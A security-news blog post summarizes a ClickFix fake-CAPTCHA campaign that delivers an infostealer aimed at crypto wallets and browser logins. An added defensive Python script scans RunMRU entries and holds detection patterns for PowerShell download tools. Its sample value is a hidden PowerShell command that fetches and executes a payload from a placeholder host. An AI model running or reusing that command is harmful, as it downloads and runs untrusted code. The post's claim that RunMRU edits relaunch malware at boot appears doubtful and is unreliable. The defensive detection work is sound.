New ClickFix Attack Targets Crypto Wallets and 25+ Browsers with Remote Access Trojan

  • Feb 22
  • 2 min read

Key Findings:


  • A new scam is targeting users by mimicking CAPTCHA verification systems

  • The attack is an evolved version of the ClickFix attacks from early 2025 targeting restaurant bookings

  • The multi-stage infection starts with a fake CAPTCHA, then triggers a PowerShell script to download malware

  • The malware, an infostealer, targets cryptocurrency wallets, browser login data, and other sensitive information


Background


This research, shared with Hackread.com, indicates the campaign is an evolved version of the ClickFix attacks that targeted restaurant bookings in early 2025. The attack is multi-stage rather than a single event: it starts when a person lands on a compromised website and is asked to complete a fake CAPTCHA.


Fake CAPTCHA Triggers Malware Infection


On January 23, 2026, analysts observed the compromised site attempting to run a command on the user's machine that read clipboard data through the Windows function CClipDataObject::GetData. Further investigation showed that once the victim interacts with the page, PowerShell, a tool built into Windows, is launched; it reaches out to an attacker-controlled address to download the malware.


Stealthy Malware Deployment


Researchers found the attackers use a tool called Donut to hide their tracks. It produces a shellcode file named cptch.bin that lets the malware run directly in the computer's memory through Windows API calls such as VirtualAlloc and CreateThread, making it nearly invisible to standard security scans.


Targeted Data Theft


The malware is selective: it first checks whether it is running on a real computer or in a virtual environment of the kind analysts use to study malware. Once it decides it is safe, it begins harvesting data from the system, targeting:


  • Cryptocurrency wallets such as MetaMask, Exodus, and Trust Wallet

  • Saved logins from over 25 browsers, including Chrome, Edge, Opera GX, and Tor

  • Steam accounts, VPN settings, and FTP details for website management


Persistence and Evasion Tactics


Researchers noted the attackers used the variable name "$finalPayload", which acted as a red flag for Microsoft Defender and led it to detect the script as Behavior:Win32/SuspClickFix.C. The attackers have nonetheless persisted, hosting various versions across different addresses.


To keep the malware active, the attackers also modify the RunMRU registry keys so the infection restarts every time the user boots the computer.
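As an added defender-side example (not code from the post or from the researchers it cites), the script below triages RunMRU values, the Win+R history the post says the attackers tamper with, for the PowerShell launcher pattern described in the infection chain above. The indicator set, the example.invalid URL and the sample registry values are constructed assumptions; only the "$finalPayload" string comes from the post.

```python
"""Triage RunMRU (Win+R history) values for the ClickFix-style PowerShell launcher
described in the post. Indicator set and sample data are assumptions, not post data."""
import re

INDICATORS = {
    "powershell_launcher": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "remote_download": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
        r"DownloadString|DownloadFile|Net\.WebClient)\b", re.I),
    "hidden_or_bypass": re.compile(
        r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|(?:ep|executionpolicy)\s+bypass)", re.I),
    "inline_execution": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "known_variable": re.compile(r"\$finalPayload", re.I),  # variable name reported in the post
}

# Constructed sample of the key's values (not from the post). RunMRU stores each
# command in a one-letter value terminated by "\1"; "MRUList" gives most-recent-first order.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "$finalPayload = iwr '
         'https://example.invalid/payload; iex $finalPayload"\\1',
}

def parse_runmru(values):
    """Return (slot, command) pairs in MRUList order with the "\\1" terminator stripped."""
    slots = list(values.get("MRUList", "")) or sorted(k for k in values if len(k) == 1)
    pairs = []
    for slot in slots:
        raw = values.get(slot)
        if raw is not None:
            pairs.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return pairs

def triage(values, min_hits=2):
    """Flag entries that launch PowerShell and carry at least one more indicator."""
    findings = []
    for slot, cmd in parse_runmru(values):
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if "powershell_launcher" in hits and len(hits) >= min_hits:
            findings.append({"slot": slot, "command": cmd, "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f"slot {f['slot']}: {', '.join(f['indicators'])}\n  {f['command']}")
```

On a Windows host, feed triage() the values of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (read with winreg or Get-ItemProperty) in place of the constructed sample.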


Sources


  • https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/

  • https://www.reddit.com/r/InfoSecNews/comments/1rayisl/new_clickfix_attack_targets_crypto_wallets_and_25/

  • https://www.linkedin.com/posts/dlross_new-clickfix-attack-targets-crypto-wallets-activity-7431178426973106176-KsQk

© 2025 by Explain IT Again.